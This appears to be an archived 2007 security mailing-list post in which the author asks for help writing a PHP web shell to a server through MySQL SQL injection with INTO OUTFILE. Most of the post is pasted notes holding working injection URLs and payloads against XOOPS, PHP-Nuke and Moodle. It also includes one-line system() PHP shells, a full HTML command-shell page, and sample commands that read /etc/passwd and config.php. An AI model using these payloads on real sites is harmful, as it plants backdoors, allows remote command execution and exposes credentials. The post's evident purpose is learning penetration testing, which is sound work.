Writing a phpshell via SQL Injection to a host

From: Joseph McCray (joe@learnsecurityonline.com)
Date: Wed Dec 12 2007 - 12:40:11 EST


Ok guys...

I've really been hitting SQL Injection pretty hard lately. I feel pretty
comfy with SQL Injection on MSSQL server now, and I'm starting to play
with with it on MySQL.

Feeling pretty confident on inference based stuff so now I'm working on
writing a phpshell to a host. I'm really hoping that someone here can
point me in the right direction to figure this out, and/or provide me
with some clarification on the specifics of the attack.

The best reference on this type of attack that I've found so far is:
http://www.webapptest.org/index.php?entry=entry070910-130659

He does it like this:
{begining of injection} AND 1=0 UNION SELECT 1,1,1,'my code here' INTO
OUTFILE '/www/htdocs/shell.php/'/*

I've found a few other exploits that actually use this technique, but
they don't implement it in the same way. So I'm still not following the
logic, the methodology - that whatever...dude I don't f*cking know how
to make this work - it just hasn't clicked for me for some reason.

I'm missing something here....

So the primary conditions where this attack is possible are:

1. mysql user must have the FILE privilege;

2. the operator requires a "quoted" file pathname, so the web
application should not escape/filter them;

3. httpd and mysql should be installed on the same machine, or (if you
can) the file will be written on the dbms machine;

4. You need to know the fullpath name of the web root.

===================

1. Ok, FILE privilege - Will you see some sort of permission denied
error during the attempt? How will I be able to determine this remotely?

2. This one is probably just trial and error (cross your fingers and
hope I guess) to figure this out.

3. This is pretty common

4. This can be enumerated by reading the errors from your injection.

Ok let's get to the meat of the attack.

-QUOTE-
AND 1=0" because in this way I was able to make the first query returns
0 rows (so no data from the original query will be inserted in
shell.php). Second : we can notice that in shell.php there are some
undesired data (1 1 1). To avoid their presence we can use "null" or ''.
-/QUOTE-

Exploits I found that write a phpshell are not using the 1=0. I don't
understand why. I've posted a few that I've found below. Can someone
clarify?

Next, I'm really not understanding there zeros before and after the
actual phpshell page. (e.g. ,0 ,0 ,0 ,0)

How do I know how many of these zeros I need, if at all. Someone told me
that it had something to do with the number of columns in the table. Can
someone clarify?

-----------SQL Injection with INTO OUTFILE Notes:------------

######################
# N-13 Exploit Usage #
######################
"0' UNION SELECT '0' , '<? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0
INTO \
OUTFILE '$outfile"

go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results

############
# Option 1 #
############
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php
system($_GET["-cmd"]); ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print shell_exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/help.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

############
# Option 2 #
############
1. create a php-file with the following code: <?php
system($_GET['cmd']); ?>

2. save it as shell.php

3. now you can execute commands by connecting to this file:

http://yourserver.com/shell.php?cmd=[command you want to execute]

########################
# XOOPS Exploit Method #
########################
http://[target]/[path_to_xoops]/modules/wfdownloads/viewcat.php?list=-1'%20or'a'='a'%2 \
0UNION%20SELECT%200,0,0,'<?php%
20system($_GET[cmd]);?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, \
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20INTO%20OUTFILE%
20'../../www/xoops/uploads/shell.php'%2 \
0FROM%20fXZtr_wfdownloads_downloads/*

after you can launch commands:
http://[target]/[path_to_xoops]/uploads/shell.php?cmd=cat%20/etc/passwd

###########################
# PHP-Nuke Exploit Method #
###########################
'UNION SELECT '<?error_reporting(0);?>',0,0,0,0,0,0,0,'<?echo \"Hi
Master\";ini_set(\"max_execution_time\",0);system(\$_GET[cmd]);die;?>',0
INTO OUTFILE '".$pathtoWWW.$path."shell.php' FROM nuke_users/*

#########################
# Moodle Exploit Method #
#########################
[1] http://[target]/[path]/course/category.php?id='%20UNION%20SELECT%
200,'<?
php%20system($_GET[cmd]);%20?>',0,0,0,0,0,0%20INTO%20DUMPFILE%20'../../w
ww/moodle/shell.php'%20FROM%20mdl_course_categories/*

[2] http://[target]/[path]/course/info.php?id='UNION%20SELECT%
200,0,0,0,'<?p
hp%20system($_GET[cmd]);%20?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0%20INTO%20DUMPFILE%20'../../www/moodle/shell.php'%20FROM%2
0mdl_course/*

now in shell.php we have something like:

00000<?php system($_GET[cmd]); ?>000000

so you can launch commands, ex.:

http://[target]/[path]/shell.php?cmd=cat%20config.php

##############################
# Nice Name Crew PHP Shell 1 #
##############################
INSERT INTO `test` VALUES (' INSERT INTO shell (codetab) values (''<?
$cmd=$_REQUEST["-cmd"];\r\n ?><html><head><title>DarksideĀ“s php
shell</title></head><body bgcolor=#000000 text=#ffffff\r\n
onLoad="document.forms[0].elements[-cmd].focus()"><form
method=POST><br><input type=TEXT \r\n name="-cmd" size=64 value="<?=
$cmd?>" style=background:#000000;color:#ffffff;"><pre><?\r\n if($cmd !
="") print Shell_Exec($cmd);?></pre></form></body></html>'');\r\n SELECT
* INTO OUTFILE ''/srv/www/htdocs/tbl_cmd.php''from test;\r\n FLUSH LOGS;
\r\n');

-------------------end of my notes---------------------------------

I'd really like some help in figuring this one out. There are some
basics that just aren't clicking for me. Any help would be greatly
appreciated.

-- 
Joe McCray
Toll Free:  1-866-892-2132
Email:      joe@learnsecurityonline.com
Web:        https://www.learnsecurityonline.com
Learn Security Online, Inc.
* Security Games        * Simulators
* Challenge Servers     * Courses
* Hacking Competitions  * Hacklab Access
"The only thing worse than training good employees and losing them 
is NOT training your employees and keeping them." 
        - Zig Ziglar




This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:16 EDT